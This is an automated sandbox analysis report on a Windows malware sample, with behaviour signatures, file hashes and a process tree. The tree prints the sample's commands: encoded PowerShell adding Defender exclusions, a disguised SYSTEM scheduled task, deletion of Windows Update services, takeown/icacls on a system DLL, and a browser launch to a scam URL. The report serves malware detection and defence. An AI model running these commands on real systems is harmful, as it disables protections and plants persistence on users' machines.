Analysis
-
max time kernel
169s -
max time network
182s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
14-07-2022 03:01
Static task
static1
Behavioral task
behavioral1
Sample
be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
Resource
win7-20220414-en
General
-
Target
be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
-
Size
7.5MB
-
MD5
a29f3494661a52e3c66a2908389c5010
-
SHA1
1645351e4b00a678ad7c4ac7784bf8d9c8703297
-
SHA256
be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266
-
SHA512
1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
setup.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe -
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
setup.exepid process 4600 setup.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
icacls.exetakeown.exepid process 4600 icacls.exe 3216 takeown.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat cmd.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 3216 takeown.exe 4600 icacls.exe -
Processes:
resource yara_rule C:\Windows\Temp\setup.exe themida C:\Windows\Temp\setup.exe themida behavioral2/memory/4600-135-0x0000000000400000-0x00000000010BD000-memory.dmp themida behavioral2/memory/4600-138-0x0000000000400000-0x00000000010BD000-memory.dmp themida behavioral2/memory/4600-152-0x0000000000400000-0x00000000010BD000-memory.dmp themida behavioral2/memory/4600-157-0x0000000000400000-0x00000000010BD000-memory.dmp themida -
Processes:
setup.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
setup.exepid process 4600 setup.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1384 sc.exe 1672 sc.exe 3548 sc.exe 3348 sc.exe 3108 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 3904 reg.exe 2288 reg.exe 4804 reg.exe 1468 reg.exe 3352 reg.exe 2052 reg.exe 2384 reg.exe 4336 reg.exe 1336 reg.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
msedge.exemsedge.exepowershell.execonhost.exepid process 3928 msedge.exe 3928 msedge.exe 3356 msedge.exe 3356 msedge.exe 1976 powershell.exe 1976 powershell.exe 3628 conhost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
msedge.exepid process 3356 msedge.exe 3356 msedge.exe 3356 msedge.exe 3356 msedge.exe 3356 msedge.exe 3356 msedge.exe 3356 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exedescription pid process Token: SeDebugPrivilege 1976 powershell.exe Token: SeShutdownPrivilege 2608 powercfg.exe Token: SeCreatePagefilePrivilege 2608 powercfg.exe Token: SeShutdownPrivilege 2480 powercfg.exe Token: SeCreatePagefilePrivilege 2480 powercfg.exe Token: SeDebugPrivilege 3628 conhost.exe Token: SeShutdownPrivilege 2960 powercfg.exe Token: SeCreatePagefilePrivilege 2960 powercfg.exe Token: SeShutdownPrivilege 4548 powercfg.exe Token: SeCreatePagefilePrivilege 4548 powercfg.exe Token: SeTakeOwnershipPrivilege 3216 takeown.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
msedge.exepid process 3356 msedge.exe 3356 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.execmd.exemsedge.exedescription pid process target process PID 4872 wrote to memory of 4600 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe setup.exe PID 4872 wrote to memory of 4600 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe setup.exe PID 4872 wrote to memory of 4884 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe cmd.exe PID 4872 wrote to memory of 4884 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe cmd.exe PID 4872 wrote to memory of 4884 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe cmd.exe PID 4872 wrote to memory of 4904 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe cmd.exe PID 4872 wrote to memory of 4904 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe cmd.exe PID 4872 wrote to memory of 4904 4872 be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe cmd.exe PID 4904 wrote to memory of 3356 4904 cmd.exe msedge.exe PID 4904 wrote to memory of 3356 4904 cmd.exe msedge.exe PID 3356 wrote to memory of 544 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 544 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3772 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3928 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 3928 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe PID 3356 wrote to memory of 4132 3356 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4872 -
C:\Windows\Temp\setup.exe"C:\Windows\Temp\setup.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4600 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="4⤵PID:5024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'4⤵PID:3700
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'5⤵
- Creates scheduled task(s)
PID:4144 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵PID:2756
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:4124
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵PID:2680
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:2060
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵PID:3068
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵PID:3920
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵PID:4924
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵PID:3220
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵PID:532
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:4804 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:1468 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
PID:3352 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
PID:4336 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵PID:4620
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "2⤵
- Drops startup file
PID:4884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl3⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffecd2146f8,0x7ffecd214708,0x7ffecd2147184⤵PID:544
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:24⤵PID:3772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:3928 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:84⤵PID:4132
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:14⤵PID:3672
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:14⤵PID:1456
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 /prefetch:84⤵PID:616
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1444 /prefetch:14⤵PID:1452
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:14⤵PID:1120
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:14⤵PID:4220
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:14⤵PID:1652
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,14739173038681984170,17221224849975373888,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:14⤵PID:4944
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1152
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
C:\Windows\system32\sc.exesc stop bits1⤵
- Launches sc.exe
PID:1384
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f1⤵
- Modifies registry key
PID:2052
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f1⤵
- Modifies registry key
PID:3904
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f1⤵
- Modifies registry key
PID:2288
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4600
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3216
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f1⤵
- Modifies registry key
PID:1336
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f1⤵
- Modifies security service
- Modifies registry key
PID:2384
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
- Launches sc.exe
PID:1672
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
- Launches sc.exe
PID:3548
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
- Launches sc.exe
PID:3348
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
- Launches sc.exe
PID:3108
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"1⤵PID:3740
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\Temp\lol.batFilesize
59B
MD5f580e0e80cc87b25e38ea2c0c8059d04
SHA1299f51dca9c609d6da86f93c424e39c1e6ba0d94
SHA2569e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734
SHA5125a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d
-
C:\Windows\Temp\run.batFilesize
98B
MD5731afe244b2414169a5f630d52646e56
SHA1e3771ccdccd8c306ee5fc4f264cfc3310690458c
SHA2566c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552
SHA51284e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1
-
C:\Windows\Temp\setup.exeFilesize
7.3MB
MD50c9bed327840bbe964e85913d5868fcb
SHA1ef0b874b57be491ae87ed0237a025d5580265218
SHA2563296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad
SHA51212c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8
-
C:\Windows\Temp\setup.exeFilesize
7.3MB
MD50c9bed327840bbe964e85913d5868fcb
SHA1ef0b874b57be491ae87ed0237a025d5580265218
SHA2563296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad
SHA51212c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8
-
C:\Windows\system32\drivers\etc\hostsFilesize
1KB
MD5f3f6968a4c0f457f427eb17f7cc5f68b
SHA1872933578f4b7d555158189ed02015f192daa7c6
SHA256774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c
